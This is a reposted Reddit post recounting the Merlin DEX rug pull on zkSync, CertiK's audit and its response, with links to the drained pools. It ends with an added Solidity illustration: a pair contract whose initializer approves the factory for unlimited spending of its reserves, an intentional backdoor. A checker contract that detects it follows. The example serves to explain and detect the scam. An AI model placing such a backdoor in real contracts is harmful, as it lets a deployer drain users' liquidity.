
Rug Me Harder - Merlin Dex


by COINS NEWS

Let's start at the top.

Merlin was a brand new decentralized exchange launching on zkSync. It was a fork of Camelot (arbitrum) with a fairly transparent, active team. Some of them were "doxxed". The quotes are because at this point, it's unknown if those are actually the identities of the devs, but we'll stick to the facts.

April 25th: Presale goes live and genesis farms open. Early farming for the dex token of mage/stmage. StMage is just a locked version of the actual token that can be staked for dividends earned from the dex. Same old farm token shit, same as Camelot (grail/xgrail) nothing new. We have a three day LGE (liquidity generation event), not uncommon and they crossed $2m in less than 10 hours. People are excited to be on a new chain and it shows.

We're excited!

Though a red flag here is that most LGEs of unknown devs launch on an already known site. Merlin used their own. But that's okay because Certik audited them and gave them a score of 90! Not a single critical issue mentioned. Great, right?.. right?

April 26th: Discord starts getting sketchy as people start to report they can't unstake or remove their liquidity. It happens sometimes, these devs aren't perfect. The team keeps everyone calm and assures that it's just a UI error and you can still remove it through the contract. This isn't true but it calms everyone down a bit for a while. Then, a partner project (which had nothing to do with this, and lost ~10% of protocol owned liquidity) starts alerting the Merlin team that the LP they seeded is missing. He was ignored. Shortly after sending the alert to Prospero (the project lead, who is currently missing and I sure hope he's okay!), the analytics page suddenly goes down and Prospero disappears for several hours. That doesn't look good, especially since Etherscan is not available on zksync yet and we're using this janky explorer to try and see what is going on. Presale never skips a beat, people are still putting ETH into it along with LPs.

All of this is on twitter, so I didn't bother to blur any names. Steve is the legitimate person here.

Here we see he kept on trying to tell the Merlin devs something was wrong. The dev said he was "confused" and called him "incompetent". They said he was wrong, and doesn't understand how zk tech works.

Gaslighting at its best?

At this point it's becoming painfully obvious to everyone involved that the devs are in the process of rugging not only the presale, but also the Core LPs. There's a whole lot more drama here and back and forth of who is responsible and is it one dev or all devs, but this is getting long so I cut that out. I'll post the (I think) legit team member's response to all this at the end. From what I can tell, he was taken advantage of as well.

So, fast forward a few hours and it looks like only about $2 million is missing, and nothing for a big baller like Certik, who immediately jumps into action to let the community know they'll be exploring a $2 million compensation plan to cover Merlin victims. Saved, right? Well, maybe..

Certik's initial message

Next up is Certik, rolling back clarifying what they meant about the $2m they pledged. Oh, okay.

Not planning on doing anything, radio silence since.

Okay! Let's jump back to the rug. How? How could devs rug liquidity pools and the presale after passing a Certik audit with a higher score than most legit projects get? It's simple. It's two small lines of code that anyone with basic knowledge of these contracts or Solidity could spot. You don't need to be a dev to see this, but apparently Certik's $50k audit team, who does this for a living, missed it completely. BTW, after the rug they downgraded the score Merlin received to 38, then to "exit scam". Thanks for letting us know Certik, you're doing great! Now, these two lines of code essentially mean that the factory (here meaning the deployer, or rather the exploiter address) has full control over any pair on the dex. Just like you would if it was a normal contract with your liquidity. Not necessarily 100% malicious, but there's also not a single good reason to have this in the code. It's wholly unnecessary.

That's it, that's all it takes to steal millions. Just have to hope no one notices.

So while everyone is arguing about what is going on and who's involved, the funds are just being ripped. Right in plain sight, because the explorer sucks and is slow to load blocks as they finalize, but also because the devs have shut down the UI page so the majority of people can't investigate. Here are the contracts that were drained, showing where some of the funds went, if anyone is interested. From these contracts you can follow the money to a couple of CEXs and various other wallets.

ETH/USDC https://zksync2-mainnet.zkscan.io/address/0x82cf66e9a45Df1CD3837cF623F7E73C1Ae6DFf1e/token-transfers

USDC/USD+ https://zksync2-mainnet.zkscan.io/address/0xA37125136121fB2beA2A68549AaF76fe6526758C/token-transfers

Tarot https://zksync2-mainnet.zkscan.io/address/0x667A15E2A436aAacF6B51985185a26de569A9697/token-transfers

MVX https://zksync2-mainnet.zkscan.io/address/0x5734Aa9d653990cad58d3039789aCa57FB804619/token-transfers

GMD https://zksync2-mainnet.zkscan.io/address/0x41909ffb409Bf26b0042d7E0Dc8cB8Ac2Dc6002F/token-transfers

Maybe we should ask around and see what others think? Here's another dev's response to the whole thing.

lol

Most of the funds were bridged back to ETH mainnet and some ended up here https://debank.com/profile/0xa7d481944730a88b862eb57248cb1b2c8aa358ad where Certik sent a message hoping they could reason with the scammers. It's important to note Certik said that they were aware of this issue, and it was included in the audit as non-critical. I struggle to see how that's non-critical, but I don't get paid to audit contracts, so we'll leave it to the experts.

https://etherscan.io/tx/0x3516a02013176e72d1963a5a62018a8014b0a284c3acf782cb4cac4d3d8e2de5

This is CertiK. We are in possession of information leading to your location and identity. Before further action, we propose an agreement that you return the stolen funds, this project has a bug-bounty, and return of funds may earn you a bounty well above the current bounty offered. We ask that you do this for the good of the community, and we will consider your good-faith actions before proceeding further.
To verify this message, you can visit our social media channels....

No response yet. After this, some of the funds were sent to Binance and MEXC, so there is some chance the exploiters are found at some point, but the money is long gone.

So there you go. You want to steal millions? Just half-ass fork someone else's code, hire a Twitter influencer to push the launch, add these two lines, get Certik to sign off and bam, you too can be an international outlaw!

Bonus fact: ChatGPT caught these two lines that enabled the rug.

https://preview.redd.it/pzfywfxitoza1.png?889&format=png&auto=webp&s=1372e17667cf7708d27d2745ebf3ee14dd40a348

https://nitter.net/AtlasIsMe/status/1651357976953749505 This is the full thread of the background drama from one of the team members. It looks like he really was screwed over and had nothing to do with this, but that's not for me to decide.

submitted by /u/Acidhoe
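The post never shows the two lines themselves, so here is an added illustration (not Merlin's or Camelot's code, and the contract and function names are hypothetical): one way a pair contract hands "the factory" full control of its reserves is an unlimited ERC-20 approval granted to the factory in the pair's initializer, and the same view-function check a reviewer or liquidity provider can run against any live pair to see whether such an approval exists.

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.0;

interface IERC20 {
    function approve(address spender, uint256 amount) external returns (bool);
    function allowance(address owner, address spender) external view returns (uint256);
}

interface IPair {
    function factory() external view returns (address);
    function token0() external view returns (address);
    function token1() external view returns (address);
}

// Hypothetical pair laid out like a Uniswap-V2 style pair: the factory deploys it
// and calls initialize() once. Everything up to the two approve() calls is normal.
contract PairWithFactoryBackdoor {
    address public factory;
    address public token0;
    address public token1;

    constructor() { factory = msg.sender; }

    function initialize(address _token0, address _token1) external {
        require(msg.sender == factory, "FORBIDDEN");
        token0 = _token0;
        token1 = _token1;
        // The backdoor: the pair grants the factory an unlimited allowance over both
        // reserve tokens. Whoever controls the factory can then transferFrom() the
        // entire reserves out of the pair without any swap, mint or burn being
        // recorded, which is exactly what an LP sees as "can't remove liquidity".
        // A pair has no legitimate reason to approve anyone; remove both lines.
        IERC20(_token0).approve(factory, type(uint256).max);
        IERC20(_token1).approve(factory, type(uint256).max);
    }
}

// Reviewer / LP check: a pair that follows the upstream design should report
// zero allowance from itself to its factory on both tokens. Any non-zero value
// means a factory controller can drain the pool at will.
contract FactoryAllowanceCheck {
    function factoryCanDrain(address pair) external view returns (bool) {
        IPair p = IPair(pair);
        address f = p.factory();
        return IERC20(p.token0()).allowance(pair, f) > 0
            || IERC20(p.token1()).allowance(pair, f) > 0;
    }
}
```

The same check can be done without deploying anything by calling `allowance(pair, factory)` on each reserve token through any block explorer's "read contract" tab.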